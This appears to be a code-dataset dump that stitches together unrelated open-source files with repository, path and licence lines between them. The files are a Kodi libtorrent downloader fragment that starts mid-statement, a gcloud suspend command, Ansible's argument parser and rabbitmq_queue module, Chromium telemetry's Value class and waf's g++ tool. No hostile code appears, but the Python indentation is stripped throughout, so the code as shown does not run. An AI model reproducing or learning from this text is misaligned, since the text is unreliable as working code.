'https://gitlab.com/addon-alfa/alfa-repo/-/raw/master/downloads/libtorrent']
else:
__libbaseurl__ = ["https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"]
def check_exist(self, dest_path='', platform=''):
if dest_path: self.dest_path = dest_path
if platform: self.platform = platform
for libname in get_libname(self.platform):
if not filetools.exists(filetools.join(self.dest_path, libname)):
return False
return True
def check_update(self):
need_update=False
for libname in get_libname(self.platform):
if libname!='liblibtorrent.so':
self.libpath = filetools.join(self.dest_path, libname)
self.sizepath=filetools.join(self.root, self.platform['system'], self.platform['version'], libname+'.size.txt')
size=str(filetools.getsize(self.libpath))
with open(self.sizepath, "r") as size_file:
    size_old = size_file.read()
if size_old!=size:
need_update=True
return need_update
def update(self, dest_path='', platform=''):
if dest_path: self.dest_path = dest_path
if platform: self.platform = platform
if self.check_update():
for libname in get_libname(self.platform):
self.libpath = filetools.join(self.dest_path, libname)
filetools.remove(self.libpath)
self.download()
def download(self, dest_path='', platform=''):
if dest_path: self.dest_path = dest_path
if platform: self.platform = platform
ver1, ver2, ver3 = self.platform['version'].split('.') ### Alfa: rest of the method
try:
ver1 = int(ver1)
ver2 = int(ver2)
except:
ver1 = 2
ver2 = 0
if ver1 > 1 or (ver1 == 1 and ver2 >= 2):
global __libbaseurl__
__libbaseurl__ = ['https://github.com/alfa-addon/alfa-repo/raw/master/downloads/libtorrent', \
'https://gitlab.com/addon-alfa/alfa-repo/-/raw/master/downloads/libtorrent']
else:
__libbaseurl__ = ["https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"]
__settings__ = xbmcaddon.Addon(id='plugin.video.alfa') ### Alfa
filetools.mkdir(self.dest_path)
for libname in get_libname(self.platform):
p_version = self.platform['version']
if PY3: p_version += '_PY3'
dest = filetools.join(self.dest_path, libname)
log("try to fetch %s/%s/%s" % (self.platform['system'], p_version, libname))
for url_lib in __libbaseurl__: ### Alfa
url = "%s/%s/%s/%s.zip" % (url_lib, self.platform['system'], p_version, libname)
url_size = "%s/%s/%s/%s.size.txt" % (url_lib, self.platform['system'], p_version, libname)
if libname!='liblibtorrent.so':
try:
self.http = HTTP()
response = self.http.fetch(url, download=dest + ".zip", progress=False) ### Alfa
log("%s -> %s" % (url, dest))
if response.code != 200: continue ### Alfa
response = self.http.fetch(url_size, download=dest + '.size.txt', progress=False) ### Alfa
log("%s -> %s" % (url_size, dest + '.size.txt'))
if response.code != 200: continue ### Alfa
try:
unzipper = ziptools.ziptools()
unzipper.extract("%s.zip" % dest, self.dest_path)
except:
xbmc.executebuiltin('Extract("%s.zip","%s")' % (dest, self.dest_path))
time.sleep(1)
if filetools.exists(dest):
filetools.remove(dest + ".zip")
except:
import traceback
text = 'Failed download %s!' % libname
log(text)
log(traceback.format_exc(1))
#xbmc.executebuiltin("Notification(%s,%s,%s,%s)" % (__plugin__,text,750,__icon__))
continue
else:
filetools.copy(filetools.join(self.dest_path, 'libtorrent.so'), dest, silent=True) ### Alfa
#dest_alfa = filetools.join(filetools.translatePath(__settings__.getAddonInfo('Path')), \
# 'lib', libname) ### Alfa
#filetools.copy(dest, dest_alfa, silent=True) ### Alfa
dest_alfa = filetools.join(filetools.translatePath(__settings__.getAddonInfo('Profile')), \
'bin', libname) ### Alfa
filetools.remove(dest_alfa, silent=True)
filetools.copy(dest, dest_alfa, silent=True) ### Alfa
break
else:
return False
return True
def android_workaround(self, new_dest_path): ### Alfa (entera)
for libname in get_libname(self.platform):
libpath = filetools.join(self.dest_path, libname)
size = str(filetools.getsize(libpath))
new_libpath = filetools.join(new_dest_path, libname)
if filetools.exists(new_libpath):
new_size = str(filetools.getsize(new_libpath))
if size != new_size:
res = filetools.remove(new_libpath, su=True)
if res:
log('Deleted: (%s) %s -> (%s) %s' %(size, libpath, new_size, new_libpath))
if not filetools.exists(new_libpath):
res = filetools.copy(libpath, new_libpath, ch_mod='777', su=True) ### ALFA
else:
log('Module exists. Not copied... %s' % new_libpath) ### ALFA
return new_dest_path
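# Illustrative usage sketch (not part of the original module). The platform
# dict is expected to come from platform_pulsar.get_platform() and dest_path
# from the add-on settings; both are assumptions here:
#
#     platform = get_platform()
#     manager = LibraryManager(dest_path, platform)
#     if not manager.check_exist() or manager.check_update():
#         manager.download()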
|
gpl-3.0
|
Sorsly/subtle
|
google-cloud-sdk/lib/surface/compute/instances/suspend.py
|
3
|
2970
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command for suspending an instance."""
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.compute import flags
from googlecloudsdk.command_lib.compute.instances import flags as instance_flags
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class Suspend(base_classes.NoOutputAsyncMutator):
"""Suspend a virtual machine instance.
*{command}* is used to suspend a running Google Compute Engine virtual
machine. Only a running virtual machine can be suspended.
"""
@staticmethod
def Args(parser):
instance_flags.INSTANCES_ARG.AddArgument(parser)
parser.add_argument(
'--discard-local-ssd',
action='store_true',
help=('If provided, local SSD data is discarded.'))
# TODO(user): consider adding detailed help.
@property
def service(self):
return self.compute.instances
@property
def method(self):
return 'Suspend'
@property
def resource_type(self):
return 'instances'
def _CreateSuspendRequest(self, instance_ref, discard_local_ssd):
return self.messages.ComputeInstancesSuspendRequest(
discardLocalSsd=discard_local_ssd,
instance=instance_ref.Name(),
project=self.project,
zone=instance_ref.zone)
def CreateRequests(self, args):
instance_refs = instance_flags.INSTANCES_ARG.ResolveAsResource(
args, self.resources, scope_lister=flags.GetDefaultScopeLister(
self.compute_client, self.project))
return [self._CreateSuspendRequest(instance_ref, args.discard_local_ssd)
for instance_ref in instance_refs]
Suspend.detailed_help = {
'brief': 'Suspend a virtual machine instance',
'DESCRIPTION': """\
*{command}* is used to suspend a Google Compute Engine virtual machine.
Suspending a VM is the equivalent of sleep or standby mode:
the guest receives an ACPI S3 suspend signal, after which all VM state
is saved to temporary storage. An instance can only be suspended while
it is in the RUNNING state. A suspended instance will be put in
SUSPENDED state.
Alpha restrictions: Suspending a Preemptible VM is not supported and
will result in an API error. Suspending a VM that is using CSEK or GPUs
is not supported and will result in an API error.
""",
}
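# Illustrative invocation sketch (not part of the original source). Given the
# ALPHA release track and the surface location of this file, the command is
# assumed to be reachable as:
#
#     gcloud alpha compute instances suspend INSTANCE_NAME \
#         --zone us-central1-a --discard-local-ssd
#
# The --discard-local-ssd flag maps to the discardLocalSsd field of the
# ComputeInstancesSuspendRequest built in _CreateSuspendRequest above.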
|
mit
|
h4ck3rm1k3/ansible
|
v2/ansible/parsing/mod_args.py
|
1
|
10144
|
# (c) 2014 Michael DeHaan, <michael@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from six import iteritems, string_types
from types import NoneType
from ansible.errors import AnsibleParserError
from ansible.plugins import module_loader
from ansible.parsing.splitter import parse_kv
class ModuleArgsParser:
"""
There are several ways a module and argument set can be expressed:
# legacy form (for a shell command)
- action: shell echo hi
# common shorthand for local actions vs delegate_to
- local_action: shell echo hi
# most commonly:
- copy: src=a dest=b
# legacy form
- action: copy src=a dest=b
# complex args form, for passing structured data
- copy:
src: a
dest: b
# gross, but technically legal
- action:
module: copy
args:
src: a
dest: b
# extra gross, but also legal. in this case, the args specified
# will act as 'defaults' and will be overridden by any args specified
# in one of the other formats (complex args under the action, or
# parsed from the k=v string)
- command: 'pwd'
args:
chdir: '/tmp'
This class has some of the logic to canonicalize these into the form
- module: <module_name>
delegate_to: <optional>
args: <args>
Args may also be munged for certain shell command parameters.
"""
def __init__(self, task_ds=dict()):
assert isinstance(task_ds, dict)
self._task_ds = task_ds
def _split_module_string(self, str):
'''
when module names are expressed like:
action: copy src=a dest=b
the first part of the string is the name of the module
and the rest are strings pertaining to the arguments.
'''
tokens = str.split()
if len(tokens) > 1:
return (tokens[0], " ".join(tokens[1:]))
else:
return (tokens[0], "")
def _handle_shell_weirdness(self, action, args):
'''
given an action name and an args dictionary, return the
proper action name and args dictionary. This mostly is due
to shell/command being treated special and nothing else
'''
# don't handle non shell/command modules in this function
# TODO: in terms of the whole app, should 'raw' also fit here?
if action not in ['shell', 'command']:
return (action, args)
# the shell module really is the command module with an additional
# parameter
if action == 'shell':
action = 'command'
args['_uses_shell'] = True
return (action, args)
def _normalize_parameters(self, thing, action=None, additional_args=dict()):
'''
arguments can be fuzzy. Deal with all the forms.
'''
# final args are the ones we'll eventually return, so first update
# them with any additional args specified, which have lower priority
# than those which may be parsed/normalized next
final_args = dict()
if additional_args:
final_args.update(additional_args)
# how we normalize depends if we figured out what the module name is
# yet. If we have already figured it out, it's an 'old style' invocation.
# otherwise, it's not
if action is not None:
args = self._normalize_old_style_args(thing, action)
else:
(action, args) = self._normalize_new_style_args(thing)
# this can occasionally happen, simplify
if args and 'args' in args:
args = args['args']
# finally, update the args we're going to return with the ones
# which were normalized above
if args:
final_args.update(args)
return (action, final_args)
def _normalize_old_style_args(self, thing, action):
'''
deals with fuzziness in old-style (action/local_action) module invocations
returns tuple of (module_name, dictionary_args)
possible example inputs:
{ 'local_action' : 'shell echo hi' }
{ 'action' : 'shell echo hi' }
{ 'local_action' : { 'module' : 'ec2', 'x' : 1, 'y': 2 }}
standardized outputs like:
( 'command', { _raw_params: 'echo hi', _uses_shell: True } )
'''
if isinstance(thing, dict):
# form is like: local_action: { module: 'xyz', x: 2, y: 3 } ... uncommon!
args = thing
elif isinstance(thing, string_types):
# form is like: local_action: copy src=a dest=b ... pretty common
check_raw = action in ('command', 'shell', 'script')
args = parse_kv(thing, check_raw=check_raw)
elif isinstance(thing, NoneType):
# this can happen with modules which take no params, like ping:
args = None
else:
raise AnsibleParserError("unexpected parameter type in action: %s" % type(thing), obj=self._task_ds)
return args
def _normalize_new_style_args(self, thing):
'''
deals with fuzziness in new style module invocations
accepting key=value pairs and dictionaries, and always returning dictionaries
returns tuple of (module_name, dictionary_args)
possible example inputs:
{ 'shell' : 'echo hi' }
{ 'ec2' : { 'region' : 'xyz' } }
{ 'ec2' : 'region=xyz' }
standardized outputs like:
('ec2', { region: 'xyz'} )
'''
action = None
args = None
if isinstance(thing, dict):
# form is like: copy: { src: 'a', dest: 'b' } ... common for structured (aka "complex") args
thing = thing.copy()
if 'module' in thing:
action = thing['module']
args = thing.copy()
del args['module']
elif isinstance(thing, string_types):
# form is like: copy: src=a dest=b ... common shorthand throughout ansible
(action, args) = self._split_module_string(thing)
check_raw = action in ('command', 'shell', 'script')
args = parse_kv(args, check_raw=check_raw)
else:
# need a dict or a string, so giving up
raise AnsibleParserError("unexpected parameter type in action: %s" % type(thing), obj=self._task_ds)
return (action, args)
def parse(self):
'''
Given a task in one of the supported forms, parses and returns
returns the action, arguments, and delegate_to values for the
task, dealing with all sorts of levels of fuzziness.
'''
thing = None
action = None
delegate_to = None
args = dict()
#
# We can have one of action, local_action, or module specified
#
# this is the 'extra gross' scenario detailed above, so we grab
# the args and pass them in as additional arguments, which can/will
# be overwritten via dict updates from the other arg sources below
# FIXME: add test cases for this
additional_args = self._task_ds.get('args', dict())
# action
if 'action' in self._task_ds:
# an old school 'action' statement
thing = self._task_ds['action']
delegate_to = None
action, args = self._normalize_parameters(thing, additional_args=additional_args)
# local_action
if 'local_action' in self._task_ds:
# local_action is similar but also implies a delegate_to
if action is not None:
raise AnsibleParserError("action and local_action are mutually exclusive", obj=self._task_ds)
thing = self._task_ds.get('local_action', '')
delegate_to = 'localhost'
action, args = self._normalize_parameters(thing, additional_args=additional_args)
# module: <stuff> is the more new-style invocation
# walk the input dictionary to see if we recognize a module name
for (item, value) in iteritems(self._task_ds):
if item in module_loader or item == 'meta':
# finding more than one module name is a problem
if action is not None:
raise AnsibleParserError("conflicting action statements", obj=self._task_ds)
action = item
thing = value
action, args = self._normalize_parameters(value, action=action, additional_args=additional_args)
# if we didn't see any module in the task at all, it's not a task really
if action is None:
raise AnsibleParserError("no action detected in task", obj=self._task_ds)
# FIXME: disabled for now, as there are other places besides the shell/script modules where
# having variables as the sole param for the module is valid (include_vars, add_host, and group_by?)
#elif args.get('_raw_params', '') != '' and action not in ('command', 'shell', 'script', 'include_vars'):
# raise AnsibleParserError("this task has extra params, which is only allowed in the command, shell or script module.", obj=self._task_ds)
# shell modules require special handling
(action, args) = self._handle_shell_weirdness(action, args)
return (action, args, delegate_to)
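# Illustrative usage sketch (not part of the original file), based on the task
# forms described in the class docstring above:
#
#   parser = ModuleArgsParser({'local_action': 'shell echo hi'})
#   (action, args, delegate_to) = parser.parse()
#   # expected roughly: ('command', {'_raw_params': 'echo hi', '_uses_shell': True}, 'localhost')
#
#   parser = ModuleArgsParser({'copy': 'src=a dest=b'})
#   (action, args, delegate_to) = parser.parse()
#   # expected roughly: ('copy', {'src': 'a', 'dest': 'b'}, None)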
|
gpl-3.0
|
konstruktoid/ansible-upstream
|
lib/ansible/modules/messaging/rabbitmq_queue.py
|
23
|
9734
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2015, Manuel Sousa <manuel.sousa@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: rabbitmq_queue
author: "Manuel Sousa (@manuel-sousa)"
version_added: "2.0"
short_description: This module manages rabbitMQ queues
description:
- This module uses rabbitMQ Rest API to create/delete queues
requirements: [ "requests >= 1.0.0" ]
options:
name:
description:
- Name of the queue to create
required: true
state:
description:
- Whether the queue should be present or absent
- Only present is implemented at the moment
choices: [ "present", "absent" ]
default: present
login_user:
description:
- rabbitMQ user for connection
default: guest
login_password:
description:
- rabbitMQ password for connection
default: guest
login_host:
description:
- rabbitMQ host for connection
default: localhost
login_port:
description:
- rabbitMQ management api port
default: 15672
vhost:
description:
- rabbitMQ virtual host
default: "/"
durable:
description:
- whether queue is durable or not
type: bool
default: 'yes'
auto_delete:
description:
- if the queue should delete itself after all consumers/queues have unbound from it
type: bool
default: 'no'
message_ttl:
description:
- How long a message can live in queue before it is discarded (milliseconds)
default: forever
auto_expires:
description:
- How long a queue can be unused before it is automatically deleted (milliseconds)
default: forever
max_length:
description:
- How many messages can the queue contain before it starts rejecting
default: no limit
dead_letter_exchange:
description:
- Optional name of an exchange to which messages will be republished if they
- are rejected or expire
dead_letter_routing_key:
description:
- Optional replacement routing key to use when a message is dead-lettered.
- Original routing key will be used if unset
max_priority:
description:
- Maximum number of priority levels for the queue to support.
- If not set, the queue will not support message priorities.
- Larger numbers indicate higher priority.
version_added: "2.4"
arguments:
description:
- extra arguments for queue. If defined this argument is a key/value dictionary
default: {}
'''
EXAMPLES = '''
# Create a queue
- rabbitmq_queue:
name: myQueue
# Create a queue on remote host
- rabbitmq_queue:
name: myRemoteQueue
login_user: user
login_password: secret
login_host: remote.example.org
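# Hypothetical example (not from the original module documentation): a durable
# queue with a message TTL, a length limit and an extra x-argument.
- rabbitmq_queue:
    name: myBoundedQueue
    durable: yes
    auto_delete: no
    message_ttl: 60000
    max_length: 1000
    arguments:
      x-queue-mode: lazy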
'''
import json
try:
import requests
HAS_REQUESTS = True
except ImportError:
HAS_REQUESTS = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six.moves.urllib import parse as urllib_parse
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(default='present', choices=['present', 'absent'], type='str'),
name=dict(required=True, type='str'),
login_user=dict(default='guest', type='str'),
login_password=dict(default='guest', type='str', no_log=True),
login_host=dict(default='localhost', type='str'),
login_port=dict(default='15672', type='str'),
vhost=dict(default='/', type='str'),
durable=dict(default=True, type='bool'),
auto_delete=dict(default=False, type='bool'),
message_ttl=dict(default=None, type='int'),
auto_expires=dict(default=None, type='int'),
max_length=dict(default=None, type='int'),
dead_letter_exchange=dict(default=None, type='str'),
dead_letter_routing_key=dict(default=None, type='str'),
arguments=dict(default=dict(), type='dict'),
max_priority=dict(default=None, type='int')
),
supports_check_mode=True
)
url = "http://%s:%s/api/queues/%s/%s" % (
module.params['login_host'],
module.params['login_port'],
urllib_parse.quote(module.params['vhost'], ''),
module.params['name']
)
if not HAS_REQUESTS:
module.fail_json(msg="requests library is required for this module. To install, use `pip install requests`")
result = dict(changed=False, name=module.params['name'])
# Check if queue already exists
r = requests.get(url, auth=(module.params['login_user'], module.params['login_password']))
if r.status_code == 200:
queue_exists = True
response = r.json()
elif r.status_code == 404:
queue_exists = False
response = r.text
else:
module.fail_json(
msg="Invalid response from RESTAPI when trying to check if queue exists",
details=r.text
)
if module.params['state'] == 'present':
change_required = not queue_exists
else:
change_required = queue_exists
# Check if attributes change on existing queue
if not change_required and r.status_code == 200 and module.params['state'] == 'present':
if not (
response['durable'] == module.params['durable'] and
response['auto_delete'] == module.params['auto_delete'] and
(
('x-message-ttl' in response['arguments'] and response['arguments']['x-message-ttl'] == module.params['message_ttl']) or
('x-message-ttl' not in response['arguments'] and module.params['message_ttl'] is None)
) and
(
('x-expires' in response['arguments'] and response['arguments']['x-expires'] == module.params['auto_expires']) or
('x-expires' not in response['arguments'] and module.params['auto_expires'] is None)
) and
(
('x-max-length' in response['arguments'] and response['arguments']['x-max-length'] == module.params['max_length']) or
('x-max-length' not in response['arguments'] and module.params['max_length'] is None)
) and
(
('x-dead-letter-exchange' in response['arguments'] and
response['arguments']['x-dead-letter-exchange'] == module.params['dead_letter_exchange']) or
('x-dead-letter-exchange' not in response['arguments'] and module.params['dead_letter_exchange'] is None)
) and
(
('x-dead-letter-routing-key' in response['arguments'] and
response['arguments']['x-dead-letter-routing-key'] == module.params['dead_letter_routing_key']) or
('x-dead-letter-routing-key' not in response['arguments'] and module.params['dead_letter_routing_key'] is None)
) and
(
('x-max-priority' in response['arguments'] and
response['arguments']['x-max-priority'] == module.params['max_priority']) or
('x-max-priority' not in response['arguments'] and module.params['max_priority'] is None)
)
):
module.fail_json(
msg="RabbitMQ RESTAPI doesn't support attribute changes for existing queues",
)
# Copy parameters to arguments as used by RabbitMQ
for k, v in {
'message_ttl': 'x-message-ttl',
'auto_expires': 'x-expires',
'max_length': 'x-max-length',
'dead_letter_exchange': 'x-dead-letter-exchange',
'dead_letter_routing_key': 'x-dead-letter-routing-key',
'max_priority': 'x-max-priority'
}.items():
if module.params[k] is not None:
module.params['arguments'][v] = module.params[k]
# Exit if check_mode
if module.check_mode:
result['changed'] = change_required
result['details'] = response
result['arguments'] = module.params['arguments']
module.exit_json(**result)
# Do changes
if change_required:
if module.params['state'] == 'present':
r = requests.put(
url,
auth=(module.params['login_user'], module.params['login_password']),
headers={"content-type": "application/json"},
data=json.dumps({
"durable": module.params['durable'],
"auto_delete": module.params['auto_delete'],
"arguments": module.params['arguments']
})
)
elif module.params['state'] == 'absent':
r = requests.delete(url, auth=(module.params['login_user'], module.params['login_password']))
# RabbitMQ 3.6.7 changed this response code from 204 to 201
if r.status_code == 204 or r.status_code == 201:
result['changed'] = True
module.exit_json(**result)
else:
module.fail_json(
msg="Error creating queue",
status=r.status_code,
details=r.text
)
else:
result['changed'] = False
module.exit_json(**result)
if __name__ == '__main__':
main()
|
gpl-3.0
|
sgraham/nope
|
tools/telemetry/telemetry/value/__init__.py
|
1
|
12490
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
The Value hierarchy provides a way of representing the values measurements
produce such that they can be merged across runs, grouped by page, and output
to different targets.
The core Value concept provides the basic functionality:
- association with a page, may be none
- naming and units
- importance tracking [whether a value will show up on a waterfall or output
file by default]
- other metadata, such as a description of what was measured
- default conversion to scalar and string
- merging properties
A page may actually run a few times during a single telemetry session.
Downstream consumers of test results typically want to group these runs
together, then compute summary statistics across runs. Value provides the
Merge* family of methods for this kind of aggregation.
"""
import os
from telemetry.core import discover
from telemetry.core import util
# When combining a pair of Values together, it is sometimes ambiguous whether
# the values should be concatenated, or one should be picked as representative.
# The possible merging policies are listed here.
CONCATENATE = 'concatenate'
PICK_FIRST = 'pick-first'
# When converting a Value to its buildbot equivalent, the context in which the
# value is being interpreted actually affects the conversion. This is insane,
# but there you have it. There are three contexts in which Values are converted
# for use by buildbot, represented by these output-intent values.
PER_PAGE_RESULT_OUTPUT_CONTEXT = 'per-page-result-output-context'
COMPUTED_PER_PAGE_SUMMARY_OUTPUT_CONTEXT = 'merged-pages-result-output-context'
SUMMARY_RESULT_OUTPUT_CONTEXT = 'summary-result-output-context'
class Value(object):
"""An abstract value produced by a telemetry page test.
"""
def __init__(self, page, name, units, important, description,
interaction_record):
"""A generic Value object.
Args:
page: A Page object, may be given as None to indicate that the value
represents results for multiple pages.
name: A value name string, may contain a dot. Values from the same test
with the same prefix before the dot may be considered to belong to
the same chart.
units: A units string.
important: Whether the value is "important". Causes the value to appear
by default in downstream UIs.
description: A string explaining in human-understandable terms what this
value represents.
interaction_record: The string label of the TimelineInteractionRecord with
which this value is associated.
"""
# TODO(eakuefner): Check user story here after migration (crbug.com/442036)
if not isinstance(name, basestring):
raise ValueError('name field of Value must be string.')
if not isinstance(units, basestring):
raise ValueError('units field of Value must be string.')
if not isinstance(important, bool):
raise ValueError('important field of Value must be bool.')
if not ((description is None) or isinstance(description, basestring)):
raise ValueError('description field of Value must be absent or a string.')
if not ((interaction_record is None) or
isinstance(interaction_record, basestring)):
raise ValueError('interaction_record field of Value must be absent or '
'a string.')
self.page = page
self.name = name
self.units = units
self.important = important
self.description = description
self.interaction_record = interaction_record
def IsMergableWith(self, that):
return (self.units == that.units and
type(self) == type(that) and
self.important == that.important and
self.interaction_record == that.interaction_record)
@classmethod
def MergeLikeValuesFromSamePage(cls, values):
"""Combines the provided list of values into a single compound value.
When a page runs multiple times, it may produce multiple values. This
function is given the same-named values across the multiple runs, and has
the responsibility of producing a single result.
It must return a single Value. If merging does not make sense, the
implementation must pick a representative value from one of the runs.
For instance, it may be given
[ScalarValue(page, 'a', 1), ScalarValue(page, 'a', 2)]
and it might produce
ListOfScalarValues(page, 'a', [1, 2])
"""
raise NotImplementedError()
@classmethod
def MergeLikeValuesFromDifferentPages(cls, values,
group_by_name_suffix=False):
"""Combines the provided values into a single compound value.
When a full pageset runs, a single value_name will usually end up getting
collected for multiple pages. For instance, we may end up with
[ScalarValue(page1, 'a', 1),
ScalarValue(page2, 'a', 2)]
This function takes in the values of the same name, but across multiple
pages, and produces a single summary result value. In this instance, it
could produce a ScalarValue(None, 'a', 1.5) to indicate averaging, or even
ListOfScalarValues(None, 'a', [1, 2]) if concatenated output was desired.
Some results are so specific to a page that they make no sense when
aggregated across pages. If merging values of this type across pages is
non-sensical, this method may return None.
If group_by_name_suffix is True, then x.z and y.z are considered to be the
same value and are grouped together. If false, then x.z and y.z are
considered different.
"""
raise NotImplementedError()
def _IsImportantGivenOutputIntent(self, output_context):
if output_context == PER_PAGE_RESULT_OUTPUT_CONTEXT:
return False
elif output_context == COMPUTED_PER_PAGE_SUMMARY_OUTPUT_CONTEXT:
return self.important
elif output_context == SUMMARY_RESULT_OUTPUT_CONTEXT:
return self.important
def GetBuildbotDataType(self, output_context):
"""Returns the buildbot's equivalent data_type.
This should be one of the values accepted by perf_tests_results_helper.py.
"""
raise NotImplementedError()
def GetBuildbotValue(self):
"""Returns the buildbot's equivalent value."""
raise NotImplementedError()
def GetChartAndTraceNameForPerPageResult(self):
chart_name, _ = _ConvertValueNameToChartAndTraceName(self.name)
trace_name = self.page.display_name
return chart_name, trace_name
@property
def name_suffix(self):
"""Returns the string after a . in the name, or the full name otherwise."""
if '.' in self.name:
return self.name.split('.', 1)[1]
else:
return self.name
def GetChartAndTraceNameForComputedSummaryResult(
self, trace_tag):
chart_name, trace_name = (
_ConvertValueNameToChartAndTraceName(self.name))
if trace_tag:
return chart_name, trace_name + trace_tag
else:
return chart_name, trace_name
def GetRepresentativeNumber(self):
"""Gets a single scalar value that best-represents this value.
Returns None if not possible.
"""
raise NotImplementedError()
def GetRepresentativeString(self):
"""Gets a string value that best-represents this value.
Returns None if not possible.
"""
raise NotImplementedError()
@staticmethod
def GetJSONTypeName():
"""Gets the typename for serialization to JSON using AsDict."""
raise NotImplementedError()
def AsDict(self):
"""Pre-serializes a value to a dict for output as JSON."""
return self._AsDictImpl()
def _AsDictImpl(self):
d = {
'name': self.name,
'type': self.GetJSONTypeName(),
'units': self.units,
'important': self.important
}
if self.description:
d['description'] = self.description
if self.interaction_record:
d['interaction_record'] = self.interaction_record
if self.page:
d['page_id'] = self.page.id
return d
def AsDictWithoutBaseClassEntries(self):
full_dict = self.AsDict()
base_dict_keys = set(self._AsDictImpl().keys())
# Extracts only entries added by the subclass.
return dict([(k, v) for (k, v) in full_dict.iteritems()
if k not in base_dict_keys])
@staticmethod
def FromDict(value_dict, page_dict):
"""Produces a value from a value dict and a page dict.
Value dicts are produced by serialization to JSON, and must be accompanied
by a dict mapping page IDs to pages, also produced by serialization, in
order to be completely deserialized. If deserializing multiple values, use
ListOfValuesFromListOfDicts instead.
value_dict: a dictionary produced by AsDict() on a value subclass.
page_dict: a dictionary mapping IDs to page objects.
"""
return Value.ListOfValuesFromListOfDicts([value_dict], page_dict)[0]
@staticmethod
def ListOfValuesFromListOfDicts(value_dicts, page_dict):
"""Takes a list of value dicts to values.
Given a list of value dicts produced by AsDict, this method
deserializes the dicts given a dict mapping page IDs to pages.
This method performs memoization for deserializing a list of values
efficiently, where FromDict is meant to handle one-offs.
value_dicts: a list of value dicts produced by AsDict() on a value subclass.
page_dict: a dictionary mapping IDs to page objects.
"""
value_dir = os.path.dirname(__file__)
value_classes = discover.DiscoverClasses(
value_dir, util.GetTelemetryDir(),
Value, index_by_class_name=True)
value_json_types = dict((value_classes[x].GetJSONTypeName(), x) for x in
value_classes)
values = []
for value_dict in value_dicts:
value_class = value_classes[value_json_types[value_dict['type']]]
assert 'FromDict' in value_class.__dict__, \
'Subclass doesn\'t override FromDict'
values.append(value_class.FromDict(value_dict, page_dict))
return values
@staticmethod
def GetConstructorKwArgs(value_dict, page_dict):
"""Produces constructor arguments from a value dict and a page dict.
Takes a dict parsed from JSON and an index of pages and recovers the
keyword arguments to be passed to the constructor for deserializing the
dict.
value_dict: a dictionary produced by AsDict() on a value subclass.
page_dict: a dictionary mapping IDs to page objects.
"""
d = {
'name': value_dict['name'],
'units': value_dict['units']
}
description = value_dict.get('description', None)
if description:
d['description'] = description
else:
d['description'] = None
page_id = value_dict.get('page_id', None)
if page_id:
d['page'] = page_dict[int(page_id)]
else:
d['page'] = None
d['important'] = False
interaction_record = value_dict.get('interaction_record', None)
if interaction_record:
d['interaction_record'] = interaction_record
else:
d['interaction_record'] = None
return d
def ValueNameFromTraceAndChartName(trace_name, chart_name=None):
"""Mangles a trace name plus optional chart name into a standard string.
A value might just be a bareword name, e.g. numPixels. In that case, its
chart may be None.
But, a value might also be intended for display with other values, in which
case the chart name indicates that grouping. So, you might have
screen.numPixels, screen.resolution, where chart_name='screen'.
"""
assert trace_name != 'url', 'The name url cannot be used'
if chart_name:
return '%s.%s' % (chart_name, trace_name)
else:
assert '.' not in trace_name, ('Trace names cannot contain "." with an '
'empty chart_name since this is used to delimit chart_name.trace_name.')
return trace_name
def _ConvertValueNameToChartAndTraceName(value_name):
"""Converts a value_name into the equivalent chart-trace name pair.
Buildbot represents values by the measurement name and an optional trace name,
whereas telemetry represents values with a chart_name.trace_name convention,
where chart_name is optional. This convention is also used by chart_json.
This converts from the telemetry convention to the buildbot convention,
returning a 2-tuple (measurement_name, trace_name).
"""
if '.' in value_name:
return value_name.split('.', 1)
else:
return value_name, value_name
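# Illustrative sketch (not part of the original file) of how the two naming
# helpers above are intended to relate:
#   ValueNameFromTraceAndChartName('numPixels', 'screen')    -> 'screen.numPixels'
#   _ConvertValueNameToChartAndTraceName('screen.numPixels') -> ['screen', 'numPixels']  (the split pair)
#   _ConvertValueNameToChartAndTraceName('numPixels')        -> ('numPixels', 'numPixels')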
|
bsd-3-clause
|
mfisher31/libjuce
|
waflib/Tools/gxx.py
|
56
|
4064
|
#!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2006-2018 (ita)
# Ralf Habacker, 2006 (rh)
# Yinon Ehrlich, 2009
"""
g++/llvm detection.
"""
from waflib.Tools import ccroot, ar
from waflib.Configure import conf
@conf
def find_gxx(conf):
"""
Finds the program g++ and, if present, tries to detect its version number
"""
cxx = conf.find_program(['g++', 'c++'], var='CXX')
conf.get_cc_version(cxx, gcc=True)
conf.env.CXX_NAME = 'gcc'
@conf
def gxx_common_flags(conf):
"""
Common flags for g++ on nearly all platforms
"""
v = conf.env
v.CXX_SRC_F = []
v.CXX_TGT_F = ['-c', '-o']
if not v.LINK_CXX:
v.LINK_CXX = v.CXX
v.CXXLNK_SRC_F = []
